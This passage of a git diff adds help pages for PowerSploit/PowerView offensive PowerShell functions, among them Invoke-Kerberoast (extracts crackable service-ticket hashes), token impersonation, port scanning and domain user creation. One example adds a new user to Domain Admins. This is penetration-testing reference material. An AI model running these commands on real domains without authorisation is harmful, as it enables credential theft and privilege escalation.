EXAMPLE 2 -------------------------- +``` +Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local +``` + +Returns the saved network mounted drives for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for mounted drive information (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegMountedDrive + +A PSCustomObject containing the ComputerName and mounted drive information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md new file mode 100755 index 00000000..b5fe9668 --- /dev/null +++ b/docs/Recon/Get-WMIRegProxy.md @@ -0,0 +1,93 @@ +# Get-WMIRegProxy + +## SYNOPSIS +Enumerates the proxy server and WPAD conents for the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegProxy [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegProxy +``` + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Cred = Get-Credential "TESTLAB\administrator" +``` + +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local + +## PARAMETERS + +### -ComputerName +Specifies the system to enumerate proxy settings on. +Defaults to the local host. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). + +## OUTPUTS + +### PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md new file mode 100755 index 00000000..edfb89bf --- /dev/null +++ b/docs/Recon/Invoke-Kerberoast.md @@ -0,0 +1,233 @@ +# Invoke-Kerberoast + +## SYNOPSIS +Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. + +Author: Will Schroeder (@harmj0y), @machosec +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket + +## SYNTAX + +``` +Invoke-Kerberoast [[-Identity] ] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to query for user accounts with non-null service principle +names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. +The ticket format can be specified with -OutputFormat \. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Kerberoast | fl +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-Kerberoast -Domain dev.testlab.local | fl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword) +Invoke-Kerberoast -Credential $Cred -Verbose | fl + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OutputFormat +Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format. +Defaults to 'John'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Format + +Required: False +Position: Named +Default value: John +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SPNTicket + +Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md new file mode 100755 index 00000000..8e1ef273 --- /dev/null +++ b/docs/Recon/Invoke-Portscan.md @@ -0,0 +1,430 @@ +# Invoke-Portscan + +## SYNOPSIS +Simple portscan module + +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### cmdHosts +``` +Invoke-Portscan -Hosts [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +### fHosts +``` +Invoke-Portscan -HostFile [-ExcludeHosts ] [-Ports ] [-PortFile ] + [-TopPorts ] [-ExcludedPorts ] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts ] + [-Threads ] [-nHosts ] [-Timeout ] [-SleepTimer ] [-SyncFreq ] [-T ] + [-GrepOut ] [-XmlOut ] [-ReadableOut ] [-AllformatsOut ] [-noProgressMeter] + [-quiet] [-ForceOverwrite] +``` + +## DESCRIPTION +Does a simple port scan using regular sockets, based (pretty) loosely on nmap + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 +``` + +Description +----------- +Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com + +### -------------------------- EXAMPLE 2 -------------------------- +``` +echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" +``` + +Description +----------- +Does a portscan of "webstersprodigy.net", and writes a greppable output file + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet +``` + +Description +----------- +Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats + +## PARAMETERS + +### -Hosts +Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in + +```yaml +Type: String[] +Parameter Sets: cmdHosts +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -HostFile +Input hosts from file rather than commandline + +```yaml +Type: String +Parameter Sets: fHosts +Aliases: iL + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHosts +Exclude these comma seperated hosts + +```yaml +Type: String +Parameter Sets: (All) +Aliases: exclude + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ports +Include these comma seperated ports (can also be a range like 80-90) + +```yaml +Type: String +Parameter Sets: (All) +Aliases: p + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PortFile +Input ports from a file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: iP + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TopPorts +Include the x top ports - only goes to 1000, default is top 50 + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedPorts +Exclude these comma seperated ports + +```yaml +Type: String +Parameter Sets: (All) +Aliases: xPorts + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SkipDiscovery +Treat all hosts as online, skip host discovery + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Pn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PingOnly +Ping scan only (disable port scan) + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: sn + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DiscoveryPorts +Comma separated ports used for host discovery. +-1 is a ping + +```yaml +Type: String +Parameter Sets: (All) +Aliases: PS + +Required: False +Position: Named +Default value: -1,445,80,443 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +number of max threads for the thread pool (per host) + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 100 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -nHosts +number of hosts to concurrently scan + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 25 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Timeout +Timeout time on a connection in miliseconds before port is declared filtered + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 2000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SleepTimer +Wait before thread checking, in miliseconds + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 500 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SyncFreq +How often (in terms of hosts) to sync threads and flush output + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 1024 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -T +\[0-5\] shortcut performance options. +Default is 3. +higher is more aggressive. +Sets (nhosts, threads,timeout) + 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 } + 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 } + 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 } + 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 } + 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 } + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GrepOut +Greppable output file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oG + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -XmlOut +output XML file + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oX + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReadableOut +output file in 'readable' format + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oN + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllformatsOut +output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats + +```yaml +Type: String +Parameter Sets: (All) +Aliases: oA + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -noProgressMeter +Suppresses the progress meter + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -quiet +supresses returned output and don't store hosts in memory - useful for very large scans + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: q + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ForceOverwrite +Force Overwrite if output Files exist. +Otherwise it throws exception + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: F + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://webstersprodigy.net](http://webstersprodigy.net) + diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md new file mode 100755 index 00000000..2c74e3c6 --- /dev/null +++ b/docs/Recon/Invoke-ReverseDnsLookup.md @@ -0,0 +1,106 @@ +# Invoke-ReverseDnsLookup + +## SYNOPSIS +Perform a reverse DNS lookup scan on a range of IP addresses. + +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-ReverseDnsLookup [-IpRange] +``` + +## DESCRIPTION +Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. +This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-ReverseDnsLookup 74.125.228.0/29 +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the CIDR range. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses specified by the IP range specified. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup +``` + +IP HostName +-- -------- +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.1 iad23s05-in-f1.1e100.net +74.125.228.2 iad23s05-in-f2.1e100.net +74.125.228.3 iad23s05-in-f3.1e100.net +74.125.228.4 iad23s05-in-f4.1e100.net +74.125.228.5 iad23s05-in-f5.1e100.net +74.125.228.6 iad23s05-in-f6.1e100.net + +Description +----------- +Returns the hostnames of the IP addresses piped from another source. + +## PARAMETERS + +### -IpRange +Specifies the IP address range. +The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. +Comma-delimited ranges may can be provided. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com +https://github.com/mattifestation/PowerSploit]() + diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md new file mode 100755 index 00000000..4e978ac3 --- /dev/null +++ b/docs/Recon/Invoke-RevertToSelf.md @@ -0,0 +1,56 @@ +# Invoke-RevertToSelf + +## SYNOPSIS +Reverts any token impersonation. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Invoke-RevertToSelf [[-TokenHandle] ] +``` + +## DESCRIPTION +This function uses RevertToSelf() to revert any impersonated tokens. +If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation), +CloseHandle() is used to close the opened handle. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$Token = Invoke-UserImpersonation -Credential $Cred +Invoke-RevertToSelf -TokenHandle $Token + +## PARAMETERS + +### -TokenHandle +An optional IntPtr TokenHandle returned by Invoke-UserImpersonation. + +```yaml +Type: IntPtr +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md new file mode 100755 index 00000000..6b1afc47 --- /dev/null +++ b/docs/Recon/Invoke-UserImpersonation.md @@ -0,0 +1,100 @@ +# Invoke-UserImpersonation + +## SYNOPSIS +Creates a new "runas /netonly" type logon and impersonates the token. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### Credential (Default) +``` +Invoke-UserImpersonation -Credential [-Quiet] +``` + +### TokenHandle +``` +Invoke-UserImpersonation -TokenHandle [-Quiet] +``` + +## DESCRIPTION +This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType +to simulate "runas /netonly". +The resulting token is then impersonated with +ImpersonateLoggedOnUser() and the token handle is returned for later usage +with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred + +## PARAMETERS + +### -Credential +A \[Management.Automation.PSCredential\] object with alternate credentials +to impersonate in the current thread space. + +```yaml +Type: PSCredential +Parameter Sets: Credential +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TokenHandle +An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation. +If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser() +is executed. + +```yaml +Type: IntPtr +Parameter Sets: TokenHandle +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Quiet +Suppress any warnings about STA vs MTA. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### IntPtr + +The TokenHandle result from LogonUser. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md new file mode 100755 index 00000000..fc5cac09 --- /dev/null +++ b/docs/Recon/New-DomainGroup.md @@ -0,0 +1,150 @@ +# New-DomainGroup + +## SYNOPSIS +Creates a new domain group (assuming appropriate permissions) and returns the group object. + +TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainGroup [-SamAccountName] [[-Name] ] [[-DisplayName] ] + [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.GroupPrincipal with the specified +group properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' +``` + +Creates the 'TestGroup' group with the specified description. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred + +Creates the 'TestGroup' group with the specified description using the specified alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the group to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the group to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the group to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the group to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.GroupPrincipal + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md new file mode 100755 index 00000000..80f4fcf8 --- /dev/null +++ b/docs/Recon/New-DomainUser.md @@ -0,0 +1,184 @@ +# New-DomainUser + +## SYNOPSIS +Creates a new domain user (assuming appropriate permissions) and returns the user object. + +TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +New-DomainUser [-SamAccountName] [-AccountPassword] [[-Name] ] + [[-DisplayName] ] [[-Description] ] [[-Domain] ] [[-Credential] ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to create a new +DirectoryServices.AccountManagement.UserPrincipal with the specified user properties. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword + +Creates the 'harmj0y2' user with the specified description and password. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred + +Creates the 'harmj0y2' user with the specified description and password, using the specified +alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -SamAccountName +Specifies the Security Account Manager (SAM) account name of the user to create. +Maximum of 256 characters. +Mandatory. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password for the created user. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Name +Specifies the name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisplayName +Specifies the display name of the user to create. +If not provided, defaults to SamAccountName. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Description +Specifies the description of the user to create. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md new file mode 100755 index 00000000..fe6f3b36 --- /dev/null +++ b/docs/Recon/Remove-RemoteConnection.md @@ -0,0 +1,84 @@ +# Remove-RemoteConnection + +## SYNOPSIS +Destroys a connection created by New-RemoteConnection. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Remove-RemoteConnection [-ComputerName] +``` + +### Path +``` +Remove-RemoteConnection [-Path] +``` + +## DESCRIPTION +This function uses WNetCancelConnection2 to destroy a connection created by +New-RemoteConnection. +If a -Path isn't specified, a -ComputerName is required to +'unmount' \\\\$ComputerName\IPC$. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` 